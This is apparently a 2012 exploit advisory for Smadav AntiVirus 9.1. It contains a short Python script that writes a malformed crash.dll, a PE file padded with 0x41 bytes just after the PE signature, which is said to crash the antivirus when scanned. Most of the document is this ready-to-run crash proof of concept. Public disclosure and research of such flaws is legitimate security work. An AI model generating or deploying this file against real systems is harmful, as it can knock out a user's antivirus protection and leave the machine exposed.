# Exploit Title: Smadav AntiVirus - Crash PoC# Date: 10/Nov/2012# Exploit Author: Mada R Perdhana (mada@spentera.com) / Spentera Research
Team
# Vendor Homepage: http://www.smadav.net & http://www.smadav.web.id# Software Link: http://www.smadav.net/download# Version: 9.1 (Lastest Version, should be affected previous version)# Tested on: Windows XP SP 2
The product will be crash when scanning a malicious .dll generate using
this script
----python--
file = open("crash.dll","wb")
file.write("\x4d\x5a\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x41\x41\x41\x41\x41\x41\x41\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21\x54\x68\x69\x73\x20\x70\x72\x6f\x67\x72\x61\x6d\x20\x63\x61\x6e\x6e\x6f\x74\x20\x62\x65\x20\x72\x75\x6e\x20\x69\x6e\x20\x44\x4f\x53\x20\x6d\x6f\x64\x65\x2e\x0d\x0d\x0a\x24\x00\x00\x00\x00\x00\x00\x00\x8c\x9c\x76\x90\xc8\xfd\x18\xc3\xc8\xfd\x18\xc3\xc8\xfd\x18\xc3\x4b\xf5\x45\xc3\xcb\xfd\x18\xc3\xc8\xfd\x19\xc3\x53\xfd\x18\xc3\x46\xea\x78\xc3\xdf\xfd\x18\xc3\x46\xea\x17\xc3\x85\xfd\x18\xc3\x46\xea\x47\xc3\xc7\xff\x18\xc3\x46\xea\x44\xc3\xc9\xfd\x18\xc3\x46\xea\x46\xc3\xc9\xfd\x18\xc3\x46\xea\x42\xc3\xc9\xfd\x18\xc3\x52\x69\x63\x68\xc8\xfd\x18\xc3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x50\x45\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")
file.close()-------
The trick is by adding 49 bytes of malicious byte (represent with \x41)
into the .dll file, right after the PE (\x50\x45) header on the 244th byte
of the file.
